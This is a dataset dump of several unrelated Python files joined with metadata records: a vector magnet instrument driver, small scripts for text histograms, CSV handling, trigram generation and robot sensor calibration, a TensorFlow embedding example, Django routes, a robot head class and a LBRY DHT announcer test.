newX=B*math.sin(f)\n newZ=B*math.cos(f)\n self._phi=value\n if math.fabs(newX) < math.fabs(oldX):\n return self._channelX.set_field(newX) and self._channelZ.set_field(newZ)\n else:\n return self._channelZ.set_field(newZ) and self._channelX.set_field(newX) \n elif self.get_mode() == self.MODE_YZ:\n B=self.get_field()\n f=math.radians(value)\n oldY=self.get_fieldY()\n newY=B*math.sin(f)\n newZ=B*math.cos(f)\n self._phi=value\n if math.fabs(newY) < math.fabs(oldY):\n return self._channelY.set_field(newY) and self._channelZ.set_field(newZ)\n else:\n return self._channelZ.set_field(newZ) and self._channelY.set_field(newY) \n elif self.get_mode() == self.MODE_XYZ:\n if self._offseten:\n a=math.radians(self._alpha)\n ao=math.radians(self._alphaoffset)\n f=math.radians(value)\n fo=math.radians(self._phioffset)\n Bxtot=self._fieldoffset*math.cos(ao)*math.sin(fo)+self._field*math.cos(a)*math.sin(f)\n Bytot=self._fieldoffset*math.sin(ao)*math.sin(fo)+self._field*math.sin(a)*math.sin(f)\n Bztot=self._fieldoffset*math.cos(fo)+self._field*math.cos(f)\n if self._field_limit(Bxtot, Bytot, Bztot):\n if self._sweepFieldsXYZ(Bxtot, Bytot, Bztot):\n self._phi=value\n self.get_totalField()\n self.get_totalAlpha()\n self.get_totalPhi()\n return True\n else:\n logging.error(__name__ + ': Error while applying phi in offset mode')\n return False\n else: \n logging.error(__name__ + ': Field limit exceeded in offset mode')\n return False \n else:\n B=self.get_field()\n a=math.radians(self._alpha)\n f=math.radians(value)\n newZ=B*math.cos(f)\n newX=B*math.cos(a)*math.sin(f)\n newY=B*math.sin(a)*math.sin(f)\n if self._sweepFieldsXYZ(newX, newY, newZ):\n self._phi=value\n return True\n else:\n logging.error(__name__ + ': Error while applying phi')\n return False\n else:\n return False\n \n def do_get_offsetEnabled(self):\n return self._offseten\n \n def do_set_offsetEnabled(self, value):\n if value:\n if self.get_offsetEnabled():\n return True\n else:\n self._fieldoffset=0.0\n self._alphaoffset=0.0\n self._phioffset=0.0\n self._offseten=True\n self.add_parameter('offsetField', type=types.FloatType,\n flags=Instrument.FLAG_GETSET,\n units='T',\n format='%.6f')\n self.add_parameter('offsetAlpha', type=types.FloatType,\n flags=Instrument.FLAG_GETSET,\n units='degree',\n minval=-180.0, maxval=180.0,\n format='%.3f')\n self.add_parameter('offsetPhi', type=types.FloatType,\n flags=Instrument.FLAG_GETSET,\n units='degree',\n minval=-180.0, maxval=180.0,\n format='%.3f')\n self.add_parameter('totalField', type=types.FloatType,\n flags=Instrument.FLAG_GET,\n units='T',\n format='%.6f')\n self.add_parameter('totalAlpha', type=types.FloatType,\n flags=Instrument.FLAG_GET,\n units='degree',\n format='%.3f')\n self.add_parameter('totalPhi', type=types.FloatType,\n flags=Instrument.FLAG_GET,\n units='degree',\n format='%.3f')\n self.get_totalField()\n self.get_totalAlpha()\n self.get_totalPhi()\n self.get_offsetField()\n self.get_offsetAlpha()\n self.get_offsetPhi()\n return True\n else:\n if self.get_offsetEnabled():\n self._offseten=False\n self._fieldoffset=0.0\n self._alphaoffset=0.0\n self._phioffset=0.0\n self.set_field(self.get_totalField())\n self.set_alpha(self.get_totalAlpha())\n self.remove_parameter('offsetField')\n self.remove_parameter('offsetAlpha')\n self.remove_parameter('offsetPhi')\n self.remove_parameter('totalField')\n self.remove_parameter('totalAlpha')\n self.remove_parameter('totalPhi')\n return True\n else:\n return True\n \n def do_get_offsetField(self):\n return self._fieldoffset\n \n def do_set_offsetField(self, value):\n a=math.radians(self._alpha)\n ao=math.radians(self._alphaoffset)\n f=math.radians(self._phi)\n fo=math.radians(self._phioffset)\n Bxtot=value*math.cos(ao)*math.sin(fo)+self._field*math.cos(a)*math.sin(f)\n Bytot=value*math.sin(ao)*math.sin(fo)+self._field*math.sin(a)*math.sin(f)\n Bztot=value*math.cos(fo)+self._field*math.cos(f)\n if self._field_limit(Bxtot, Bytot, Bztot):\n if self._sweepFieldsXYZ(Bxtot, Bytot, Bztot):\n self._fieldoffset=value\n self.get_totalField()\n self.get_totalAlpha()\n self.get_totalPhi()\n return True\n else:\n logging.error(__name__ + ': Error while applying offset field')\n return False\n else: \n logging.error(__name__ + ': Field limit exceeded in offset mode')\n return False\n \n def do_get_offsetAlpha(self):\n return self._alphaoffset\n \n def do_set_offsetAlpha(self, value):\n a=math.radians(self._alpha)\n ao=math.radians(value)\n f=math.radians(self._phi)\n fo=math.radians(self._phioffset)\n Bxtot=self._fieldoffset*math.cos(ao)*math.sin(fo)+self._field*math.cos(a)*math.sin(f)\n Bytot=self._fieldoffset*math.sin(ao)*math.sin(fo)+self._field*math.sin(a)*math.sin(f)\n Bztot=self._fieldoffset*math.cos(fo)+self._field*math.cos(f)\n if self._field_limit(Bxtot, Bytot, Bztot):\n if self._sweepFieldsXY(Bxtot, Bytot):\n self._alphaoffset=value\n self.get_totalField()\n self.get_totalAlpha()\n self.get_totalPhi()\n return True\n else:\n logging.error(__name__ + ': Error while applying offset alpha')\n return False\n else: \n logging.error(__name__ + ': Field limit exceeded in offset mode')\n return False \n \n def do_get_offsetPhi(self):\n return self._phioffset\n\n def do_set_offsetPhi(self, value):\n a=math.radians(self._alpha)\n ao=math.radians(self._alphaoffset)\n f=math.radians(self._phi)\n fo=math.radians(value)\n Bxtot=self._fieldoffset*math.cos(ao)*math.sin(fo)+self._field*math.cos(a)*math.sin(f)\n Bytot=self._fieldoffset*math.sin(ao)*math.sin(fo)+self._field*math.sin(a)*math.sin(f)\n Bztot=self._fieldoffset*math.cos(fo)+self._field*math.cos(f)\n if self._field_limit(Bxtot, Bytot, Bztot):\n if self._sweepFieldsXYZ(Bxtot, Bytot, Bztot):\n self._phioffset=value\n self.get_totalField()\n self.get_totalAlpha()\n self.get_totalPhi()\n return True\n else:\n logging.error(__name__ + ': Error while applying offset phi')\n return False\n else: \n logging.error(__name__ + ': Field limit exceeded in offset mode')\n return False \n \n # Note: totalField is readonly in offset mode\n # and always returns the value read from the instrument\n \n def do_get_totalField(self):\n return math.hypot(math.hypot(self.get_fieldX(), self.get_fieldY()),self.get_fieldZ())\n \n # This is a tricky one\n # if it gives problems, I will just put it in try catch\n \n def do_get_totalAlpha(self):\n Bxtot=self.get_fieldX()\n Bytot=self.get_fieldY()\n Bztot=self.get_fieldZ()\n if Bztot != 0.0:\n if Bxtot != 0.0:\n return math.degrees(math.atan2(Bytot,Bxtot))\n else:\n if Bytot < 0.0:\n return 270.0\n else:\n return 90.0\n else:\n return 0.0\n \n # Same applies to this one\n \n def do_get_totalPhi(self):\n Bxtot=self.get_fieldX()\n Bytot=self.get_fieldY()\n Bztot=self.get_fieldZ()\n if Bztot != 0.0:\n return math.degrees(math.atan2(math.hypot(Bxtot, Bytot),Bztot))\n else:\n return 90.0 \n \n # checking if field is safe to apply\n # this is required only for offset XYZ fields\n # for now we only check field amplitude\n \n def _field_limit(self, Bx, By, Bz):\n if math.hypot(math.hypot(Bx, By),Bz) < self.FIELDRATING_XYZ:\n return True\n else:\n return False\n \n # these functions ensure that we always stay within the limit of the vectorfield\n \n def _sweep_X_then_Y(self, Bx, By):\n return self._channelX.set_field(Bx) and self._channelY.set_field(By)\n \n def _sweep_Y_then_X(self, Bx, By):\n return self._channelY.set_field(By) and self._channelX.set_field(Bx)\n\n def _sweep_XY_then_Z(self, Bx, By, Bz):\n return self._channelX.set_field(Bx) and self._channelY.set_field(By) and self._channelZ.set_field(Bz)\n \n def _sweep_Z_then_XY(self, Bx, By, Bz):\n return self._channelZ.set_field(Bz) and self._channelX.set_field(Bx) and self._channelY.set_field(By) \n \n def _sweepFieldsXY(self, Bx, By):\n oldXfield=self.get_fieldX()\n oldYfield=self.get_fieldY() #this is just to update By value\n if math.fabs(Bx) < math.fabs(oldXfield):\n return self._sweep_X_then_Y(Bx, By)\n else:\n return self._sweep_Y_then_X(Bx, By)\n\n def _sweepFieldsXYZ(self, Bx, By, Bz):\n oldXfield=self.get_fieldX() #this is just to update Bx value\n oldYfield=self.get_fieldY() #this is just to update By value\n oldZfield=self.get_fieldZ() \n if math.fabs(Bz) < math.fabs(oldZfield):\n return self._sweep_Z_then_XY(Bx, By, Bz)\n else:\n return self._sweep_XY_then_Z(Bx, By, Bz)\n\n\n ","sub_path":"instrument_plugins/AMI430_3D.py","file_name":"AMI430_3D.py","file_ext":"py","file_size_in_byte":41188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"635952276","text":"import string, operator\n\nclass Histograma:\n\n def __init__(self, fichero):\n self._fichero = fichero\n\n def histograma(self):\n dicc = {}\n\n try:\n s = open(self._fichero, \"rt\")\n print(\"Leyendo archivo:\",self._fichero)\n ch = s.read(1)\n while ch != '':\n if(ch == '\\n' or ch == ' '):\n ch = s.read(1)\n continue\n if ch in dicc:\n dicc[ch] = dicc[ch] + 1\n else:\n dicc[ch] = 1\n ch = s.read(1)\n s.close()\n except IOError as e:\n print(\"IOERROR: \",e)\n\n return dicc\n\nprograma = Histograma('documento.txt')\ndiccionario = programa.histograma()\n\nfor clave in sorted(diccionario.items(), key=operator.itemgetter(1), reverse=True):\n #print(clave)\n print(\"Numero de '\",clave[0],\"': \",clave[1], sep='')\n","sub_path":"business-management-systems/python/module_6/ficheros/hinstograma.py","file_name":"hinstograma.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"377261596","text":"import csv\n\nwith open('faculty.csv', 'rb') as faculty:\n with open(\"emails.csv\", 'wb') as f:\n reader = csv.reader(faculty)\n writer = csv.writer(f)\n next(faculty)\n for name, degree, title, email in reader:\n writer.writerow([email])\n\n","sub_path":"python/advanced_python_csv.py","file_name":"advanced_python_csv.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"226676790","text":"#!/usr/bin/env python3\n# coding: utf-8\nimport ev3dev.ev3 as ev3\nfrom ev3dev.ev3 import *\n#from multiprocessing import Process\nfrom time import sleep\nfrom time import time\ncor = ev3.ColorSensor('in3'); assert cor.connected\nclass Calibracao:\n def __init__(self, color, speed, time):\n self.color = color\n self.speed = speed\n self.time = time\n self.p1 = [1021,-1]\n self.p2 = [1021,-1]\n self.p3 = [1021,-1]\n def calibrate(self,wait_time, repeat):\n for i in range(repeat):\n cor_lida = cor.raw\n self.p1[0] = min(cor.raw[0], self.p1[0])\n self.p1[1] = max(cor.raw[0], self.p1[1])\n self.p2[0] = min(cor.raw[1], self.p2[0])\n self.p2[1] = max(cor.raw[1], self.p2[1])\n self.p3[0] = min(cor.raw[2], self.p3[0])\n self.p3[1] = max(cor.raw[2], self.p3[1])\n sleep(wait_time)\n def escrever(self):\n with open(self.color, \"w\") as arquivo:\n arquivo.write(str(self.p1[0]))\n arquivo.write(\",\")\n arquivo.write(str(self.p1[1]))\n arquivo.write(\",\")\n arquivo.write(str(self.p2[0]))\n arquivo.write(\",\")\n arquivo.write(str(self.p2[1]))\n arquivo.write(\",\")\n arquivo.write(str(self.p3[0]))\n arquivo.write(\",\")\n arquivo.write(str(self.p3[1]))\n arquivo.write(\",\")\nSound.speak(\"Calibrate\").wait()\nSound.speak(\"Middle Black\")\npreto = Calibracao(\"textos/preto_meio.txt\",0,0)\npreto.calibrate(0.1, 100)\npreto.escrever()\nSound.speak(\"Finished\")\n\n","sub_path":"calibrar/calibrar_meio_preto.py","file_name":"calibrar_meio_preto.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"78833277","text":"import random\nimport math\n\n\n\ndef randomkey(i):\n\n return random.choice(list(i.keys()))\n\ndef randvalue(i, k):\n\n return random.choice(i[k])\n\n\nif __name__ == \"__main__\":\n book = 'sherlock_small.txt'\n with open(book, 'r') as fp:\n input = fp.read()\n fp.close()\n\n input = input.replace('\\n', ' ').replace('\\r', ' ').lower()\n punctuation = set(['--', '.', ',', '!', '(', '('])\n for p in punctuation:\n input = input.replace(p, f'{p}')\n words = input.split()\n\n trigrams = {}\n for j in range(len(words) - 1):\n key = tuple(words[j:j + 1])\n value = words[j + 1]\n if key in trigrams.keys():\n trigrams[key].append(value)\n else:\n trigrams[key] = []\n trigrams[key].append(value)\n\n key_init = randomkey(trigrams)\n value_init = randvalue(trigrams, key_init)\n out_list = list(key_init)\n out_list.append(value_init)\n for i in range(1000):\n k = tuple(out_list[-2:])\n if k in trigrams:\n v = randvalue(trigrams, k)\n else:\n k = randomkey(trigrams)\n for i in list(k):\n out_list.append(i)\n v = randvalue(trigrams, k)\n out_list.append(v)\n paragraph = ' '.join(out_list)\n print(paragraph)","sub_path":"students/vvinodh/Lesson4/kata.py","file_name":"kata.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"205503911","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nRun with: mpirun -n 4 python -m runner_example\n\"\"\"\nfrom pyDNMFk.runner import pyDNMFk_Runner\nimport numpy as np\n\nrunner = pyDNMFk_Runner(itr=100, init='nnsvd', verbose=True, \n norm='fro', method='mu', precision=np.float32,\n checkpoint=False, sill_thr=0.6)\n\nresults = runner.run(grid=[4,1], fpath='../data/', fname='wtsi', ftype='mat', results_path='../results/',\n k_range=[1,3], step_k=1)\n\nW = results[\"W\"]\nH = results[\"H\"]","sub_path":"examples/runner_example.py","file_name":"runner_example.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"279167817","text":"# Ripped off from https://tfhub.dev/google/universal-sentence-encoder-lite/2\nimport tensorflow as tf\nimport tensorflow_hub as hub\nimport sentencepiece as spm\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport pandas as pd\nimport re\nimport seaborn as sns\n\n\n# Compute a representation for each message, showing various lengths supported.\nword = \"Elephant\"\nsentence = \"I am a sentence for which I would like to get its embedding.\"\nparagraph = (\n \"Universal Sentence Encoder embeddings also support short paragraphs. \"\n \"There is no hard limit on how long the paragraph is. Roughly, the longer \"\n \"the more 'diluted' the embedding will be.\")\nmessages = [word, sentence, paragraph]\n\nmodule = hub.Module(\"https://tfhub.dev/google/universal-sentence-encoder-lite/2\")\n\n\ninput_placeholder = tf.sparse_placeholder(tf.int64, shape=[None, None])\nencodings = module(\n inputs=dict(\n values=input_placeholder.values,\n indices=input_placeholder.indices,\n dense_shape=input_placeholder.dense_shape))\n\nwith tf.Session() as sess:\n spm_path = sess.run(module(signature=\"spm_path\"))\n\nsp = spm.SentencePieceProcessor()\nsp.Load(spm_path)\nprint(\"SentencePiece model loaded at {}.\".format(spm_path))\n\n\ndef process_to_IDs_in_sparse_format(sp, sentences):\n # An utility method that processes sentences with the sentence piece processor\n # 'sp' and returns the results in tf.SparseTensor-similar format:\n # (values, indices, dense_shape)\n print(\"sentences\", sentences)\n ids = [sp.EncodeAsIds(x) for x in sentences] #convert words in sentences to indexes\n print(\"ids\", ids) # array of [index for each word]\n max_len = max(len(x) for x in ids) #num_samples, 3\n dense_shape=(len(ids), max_len)#(3, 53)\n print(\"dense_shape\", dense_shape) \n values=[item for sublist in ids for item in sublist] #flatten\n indices=[[row,col] for row in range(len(ids)) for col in range(len(ids[row]))]\n print(\"values\", values)\n print(\"indices\", indices)\n print(\"dense_shape\", dense_shape)\n return (values, indices, dense_shape)\n\n\nvalues, indices, dense_shape = process_to_IDs_in_sparse_format(sp, messages)\n\n\n# Reduce logging output.\ntf.logging.set_verbosity(tf.logging.ERROR)\n\nwith tf.Session() as session:\n session.run([tf.global_variables_initializer(), tf.tables_initializer()])\n message_embeddings = session.run(\n encodings,\n feed_dict={input_placeholder.values: values,\n input_placeholder.indices: indices,\n input_placeholder.dense_shape: dense_shape})\n\n for i, message_embedding in enumerate(np.array(message_embeddings).tolist()):\n print(\"Message: {}\".format(messages[i]))\n print(\"Embedding size: {}\".format(len(message_embedding)))\n message_embedding_snippet = \", \".join(\n (str(x) for x in message_embedding[:3]))\n print(\"Embedding: [{}, ...]\\n\".format(message_embedding_snippet))\n\n\n\n\n\nembed_size = module.get_output_info_dict()['default'].get_shape()[1].value\nprint(embed_size)\ndef UniversalEmbedding(x):\n return module(tf.squeeze(tf.cast(x, tf.string)), signature=\"default\", as_dict=True)[\"default\"]\n'''\ndef UniversalEmbedding(x):\n return module(tf.squeeze(tf.cast(x, tf.string)))\n'''\nfrom keras.layers import Input, LSTM, Dense, Lambda\n\n\ninput_text = layers.Input(shape=(1,), dtype=tf.string)\nembedding = layers.Lambda(UniversalEmbedding, output_shape=(embed_size,))(input_text)\ndense = layers.Dense(256, activation='relu')(embedding)\npred = layers.Dense(6, activation='softmax')(dense)\nmodel = Model(inputs=[input_text], outputs=pred)\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\nmodel.summary()","sub_path":"lite-2.py","file_name":"lite-2.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"97086467","text":"from django.conf.urls import url\nfrom django.conf import settings\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n\n url(r'^(?P[0-9]+)/$', views.preview, name='preview'),\n\n url(r'^(?P[0-9]+)/subview/$', views.subview, name='subview'),\n \n url(r'^(?P[0-9]+)/code/$', views.code, name='code'),\n \n url(r'^(?P[0-9]+)/edit$', views.edit, name='edit'),\n\n url(r'^create-action|create-info|create-appeal/$', views.create, name='create'),\n]\n","sub_path":"emailmanager/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"18491706","text":"# -*- coding: utf-8 -*-\nimport json\nfrom collections import OrderedDict\nfrom gl_lib.sim.robot.sensor import CapteurIR, Accelerometre, Camera, Capteur\n\nfrom gl_lib.sim.geometry import *\nfrom math import pi\n\n\nclass Tete(Objet3D):\n \"\"\"\n Définit une tête, ses capteurs et ses primitives de rotation\n\n Le centre et la direction de la tête peuvent être liés à un couple (centre, dir_robot) (cf __init__)\n La tête peut toujours tourner par rapport à dir_robot, à condition de mettre à jour direction avec set_dir()\n \"\"\"\n # indices pour repérer les capteurs\n SENSORS = [\"acc\", \"ir\", \"cam\"]\n KEYS = [\"centre\", \"dir_robot\", \"dir_rel\", \"direction\", \"sensors\"]\n INIT = {\"centre\":Point(0,0,0),\"dir_robot\":Vecteur(1,0,0), \"dir_rel\":Vecteur(1,0,0), \"direction\":Vecteur(1,0,0)}\n\n def __init__(self, **kwargs):\n \"\"\"\n Initialise les attributs de la tête, avec la direction de la tête égale en valeur à la direction de\n référence\n\n La tête crée par défaut est équipée de 3 capteurs: infrarouge de distance, caméra et accéléromètre\n :param centre: Centre de la tête\n :type centre: Point\n :param dir_robot: Direction de référence de la tête\n :type dir_robot: Vecteur\n :param dir_rel: Direction relative de la tête par rapport à la direction de référence\n :type dir_rel: Vecteur\n :param direction: Direction réelle de la tête\n :type direction: Vecteur\n :param sensors: Dictionnaire de capteurs\n :type sensors: {Capteur}\n \"\"\"\n for key in Tete.INIT.keys():\n if not key in kwargs.keys():\n kwargs[key] = Tete.INIT[key]\n keys = kwargs.keys()\n Objet3D.__init__(self, **{key:kwargs[key] for key in keys if key in Objet3D.KEYS})\n self.dir_robot = kwargs[\"dir_robot\"]\n self.dir_rel = kwargs[\"dir_rel\"]\n angle = self.dir_rel.get_angle()\n self.direction = self.dir_robot.clone().rotate(angle)\n\n if \"direction\" in keys:\n self.direction = kwargs[\"direction\"]\n\n if \"sensors\" in keys:\n self.sensors = kwargs[\"sensors\"]\n for c in self.sensors.keys():\n (self.sensors[c]).attach(self.centre, (self.sensors[c]).direction)\n else:\n # Si aucun dictionnaire en argument, en initialise un par défaut\n self.sensors = dict()\n self.sensors[\"ir\"] = CapteurIR(self.centre, self.direction)\n self.sensors[\"acc\"] = Accelerometre(self.centre, self.direction)\n self.sensors[\"cam\"] = Camera(self.centre, self.direction)\n\n\n def add_sensors(self, dict_sensors):\n \"\"\"\n Permet d'ajouter n'importequel type de capteur\n Il suffit de le donner, avec son nom, en argument dans un dictionnaire\n\n :param dict_sensors: Dictionnaire contenant les couples \"nomcapteur\":capteur\n :type dict_sensors: {Capteur}\n :return: Retourne le nombre de capteurs ajoutés\n\n \"\"\"\n if len(dict_sensors.keys()) < 1:\n return 0\n cpt = 0\n for key in dict_sensors.keys():\n self.sensors[key] = dict_sensors[key].clone()\n cpt += 1\n return cpt\n\n def attach(self, centre, direction):\n \"\"\"\n Permet d'attacher la tête et ses capteurs à un point et une direction\n contrairement au centre de la tête par rapport à centre\n\n :param centre: On copie la référence\n :type centre: Point\n :param direction: On copie la référence\n :type direction: Vecteur\n \"\"\"\n self.dir_robot = direction\n # La direction de la tête est initialisée à direction, mais ne pointe pas vers l'argument\n self.direction = direction.clone()\n # Contrairement au centre de la tête\n self.centre = centre\n for k in Tete.SENSORS:\n if self.sensors[k] is not None:\n # Il en va de même pour les capteurs\n self.sensors[k].centre = centre\n self.sensors[k].direction = self.direction.clone()\n\n def __dict__(self):\n dct = OrderedDict()\n dct[\"__class__\"] = Tete.__name__\n l = list()\n if len(self.sensors) >= 1:\n l = {k: self.sensors[k].__dict__() for k in Tete.SENSORS if self.sensors[k] is not None}\n dct[\"centre\"] = self.centre.__dict__()\n dct[\"direction\"] = self.direction.__dict__()\n dct[\"dir_robot\"] = self.dir_robot.__dict__()\n dct[\"dir_rel\"] = self.dir_rel.__dict__()\n dct[\"lcapteurs\"] = l\n return dct\n\n def __str__(self):\n \"\"\"\n Affiche uniquement le nom de la classe et la liste de capteurs sous forme simplifiée\n \"\"\"\n s = \"{}; sensors: {}\".format(self.__class__.__name__, [str(self.sensors[key]) for key in self.sensors.keys()])\n return s\n\n def __eq__(self, other):\n if Objet3D.__eq__(self, other) is False:\n return False\n if self.dir_robot != other.dir_robot or self.direction != other.direction:\n return False\n if self.dir_rel != other.dir_rel:\n return False\n for k in self.sensors.keys():\n if self.sensors[k] != other.sensors[k]:\n return False\n return True\n\n def rotate(self, angle: float, axis=None):\n \"\"\"\n Tourne le vecteur qui représenta la direction de la tête relativement à celle du robot, prise à (1,0,0)\n \"\"\"\n self.dir_rel.rotate(angle, axis)\n\n def set_dir(self):\n \"\"\"\n Met à jour la direction de la tête en fonction de sa direction relative dir_rel et la direction de\n référence dir_robot\n \"\"\"\n angle = self.dir_rel.get_angle()\n self.direction = self.dir_robot.clone().rotate(angle)\n for key in self.sensors.keys():\n self.sensors[key].direction = self.direction\n self.sensors[key].centre = self.centre\n\n def update(self):\n \"\"\"\n Met à jour la direction et les capteurs\n \"\"\"\n self.set_dir()\n for k in self.sensors.keys():\n self.sensors[k].update()\n\n @staticmethod\n def hook(dct):\n if not \"__class__\" in dct.keys():\n return dct\n if dct[\"__class__\"] == Vecteur.__name__:\n return Vecteur.hook(dct)\n elif dct[\"__class__\"] == Point.__name__:\n return Point.hook(dct)\n elif dct[\"__class__\"] == CapteurIR.__name__:\n return CapteurIR.hook(dct)\n elif dct[\"__class__\"] == Camera.__name__:\n return Camera.hook(dct)\n elif dct[\"__class__\"] == Accelerometre.__name__:\n return Accelerometre.hook(dct)\n elif dct[\"__class__\"] == Tete.__name__:\n return Tete(**dct)\n\n @staticmethod\n def load(filename):\n \"\"\"\n Permet de charger une tête au format json\n\n :param filename: Nom fu fichier à charger\n\n \"\"\"\n with open(filename, 'r', encoding='utf-8') as f:\n return json.load(f, object_hook=Tete.hook)\n\n\n\nif __name__ == '__main__':\n t = Tete()\n\n t.save(\"tete.json\")\n t2 = Tete.load(\"tete.json\")\n print(str(t2))\n","sub_path":"gl_lib/sim/robot/Tete.py","file_name":"Tete.py","file_ext":"py","file_size_in_byte":7244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"94064713","text":"import contextlib\nimport typing\nimport binascii\nimport socket\nimport asyncio\nfrom lbry.testcase import AsyncioTestCase\nfrom tests import dht_mocks\nfrom lbry.conf import Config\nfrom lbry.dht import constants\nfrom lbry.dht.node import Node\nfrom lbry.dht.peer import PeerManager, make_kademlia_peer\nfrom lbry.dht.blob_announcer import BlobAnnouncer\nfrom lbry.extras.daemon.storage import SQLiteStorage\nfrom unittest import skip\n\nclass TestBlobAnnouncer(AsyncioTestCase):\n async def setup_node(self, peer_addresses, address, node_id):\n self.nodes: typing.Dict[int, Node] = {}\n self.advance = dht_mocks.get_time_accelerator(self.loop, self.loop.time())\n self.conf = Config()\n self.storage = SQLiteStorage(self.conf, \":memory:\", self.loop, self.loop.time)\n await self.storage.open()\n self.peer_manager = PeerManager(self.loop)\n self.node = Node(self.loop, self.peer_manager, node_id, 4444, 4444, 3333, address)\n await self.node.start_listening(address)\n self.blob_announcer = BlobAnnouncer(self.loop, self.node, self.storage)\n for node_id, address in peer_addresses:\n await self.add_peer(node_id, address)\n self.node.joined.set()\n self.node._refresh_task = self.loop.create_task(self.node.refresh_node())\n\n async def add_peer(self, node_id, address, add_to_routing_table=True):\n n = Node(self.loop, PeerManager(self.loop), node_id, 4444, 4444, 3333, address)\n await n.start_listening(address)\n self.nodes.update({len(self.nodes): n})\n if add_to_routing_table:\n self.node.protocol.add_peer(\n make_kademlia_peer(\n n.protocol.node_id, n.protocol.external_ip, n.protocol.udp_port\n )\n )\n\n @contextlib.asynccontextmanager\n async def _test_network_context(self, peer_addresses=None):\n self.peer_addresses = peer_addresses or [\n (constants.generate_id(2), '1.2.3.2'),\n (constants.generate_id(3), '1.2.3.3'),\n (constants.generate_id(4), '1.2.3.4'),\n (constants.generate_id(5), '1.2.3.5'),\n (constants.generate_id(6), '1.2.3.6'),\n (constants.generate_id(7), '1.2.3.7'),\n (constants.generate_id(8), '1.2.3.8'),\n (constants.generate_id(9), '1.2.3.9'),\n ]\n try:\n with dht_mocks.mock_network_loop(self.loop):\n await self.setup_node(self.peer_addresses, '1.2.3.1', constants.generate_id(1))\n yield\n finally:\n self.blob_announcer.stop()\n self.node.stop()\n for n in self.nodes.values():\n n.stop()\n\n async def chain_peer(self, node_id, address):\n previous_last_node = self.nodes[len(self.nodes) - 1]\n await self.add_peer(node_id, address, False)\n last_node = self.nodes[len(self.nodes) - 1]\n peer = last_node.protocol.get_rpc_peer(\n make_kademlia_peer(\n previous_last_node.protocol.node_id, previous_last_node.protocol.external_ip,\n previous_last_node.protocol.udp_port\n )\n )\n await peer.ping()\n return peer\n\n @skip(\"Something from a previous test is leaking into this test and causing it to fail intermittently\")\n async def test_announce_blobs(self):\n blob1 = binascii.hexlify(b'1' * 48).decode()\n blob2 = binascii.hexlify(b'2' * 48).decode()\n\n async with self._test_network_context():\n await self.storage.add_blobs((blob1, 1024), (blob2, 1024), finished=True)\n await self.storage.db.execute(\n \"update blob set next_announce_time=0, should_announce=1 where blob_hash in (?, ?)\",\n (blob1, blob2)\n )\n to_announce = await self.storage.get_blobs_to_announce()\n self.assertEqual(2, len(to_announce))\n self.blob_announcer.start(batch_size=1) # so it covers batching logic\n # takes 60 seconds to start, but we advance 120 to ensure it processed all batches\n await self.advance(60.0 * 2)\n to_announce = await self.storage.get_blobs_to_announce()\n self.assertEqual(0, len(to_announce))\n self.blob_announcer.stop()\n\n # test that we can route from a poorly connected peer all the way to the announced blob\n\n await self.chain_peer(constants.generate_id(10), '1.2.3.10')\n await self.chain_peer(constants.generate_id(11), '1.2.3.11')\n await self.chain_peer(constants.generate_id(12), '1.2.3.12')\n await self.chain_peer(constants.generate_id(13), '1.2.3.13')\n await self.chain_peer(constants.generate_id(14), '1.2.3.14')\n await self.advance(61.0)\n\n last = self.nodes[len(self.nodes) - 1]\n search_q, peer_q = asyncio.Queue(loop=self.loop), asyncio.Queue(loop=self.loop)\n search_q.put_nowait(blob1)\n\n _, task = last.accumulate_peers(search_q, peer_q)\n found_peers = await peer_q.get()\n task.cancel()\n\n self.assertEqual(1, len(found_peers))\n self.assertEqual(self.node.protocol.node_id, found_peers[0].node_id)\n self.assertEqual(self.node.protocol.external_ip, found_peers[0].address)\n self.assertEqual(self.node.protocol.peer_port, found_peers[0].tcp_port)\n\n async def test_popular_blob(self):\n peer_count = 150\n addresses = [\n (constants.generate_id(i + 1), socket.inet_ntoa(int(i + 0x01000001).to_bytes(length=4, byteorder='big')))\n for i in range(peer_count)\n ]\n blob_hash = b'1' * 48\n\n async with self._test_network_context(peer_addresses=addresses):\n total_seen = set()\n announced_to = self.nodes[0]\n for i in range(1, peer_count):\n node = self.nodes[i]\n kad_peer = make_kademlia_peer(\n node.protocol.node_id, node.protocol.external_ip, node.protocol.udp_port\n )\n await announced_to.protocol._add_peer(kad_peer)\n peer = node.protocol.get_rpc_peer(\n make_kademlia_peer(\n announced_to.protocol.node_id,\n announced_to.protocol.external_ip,\n announced_to.protocol.udp_port\n )\n )\n response = await peer.store(blob_hash)\n self.assertEqual(response, b'OK')\n peers_for_blob = await peer.find_value(blob_hash, 0)\n if i == 1:\n self.assertNotIn(blob_hash, peers_for_blob)\n self.assertEqual(peers_for_blob[b'p'], 0)\n else:\n self.assertEqual(len(peers_for_blob[blob_hash]), min(i - 1, constants.K))\n self.assertEqual(len(announced_to.protocol.data_store.get_peers_for_blob(blob_hash)), i)\n if i - 1 > constants.K:\n self.assertEqual(len(peers_for_blob[b'contacts']), constants.K)\n self.assertEqual(peers_for_blob[b'p'], ((i - 1) // (constants.K + 1)) + 1)\n seen = set(peers_for_blob[blob_hash])\n 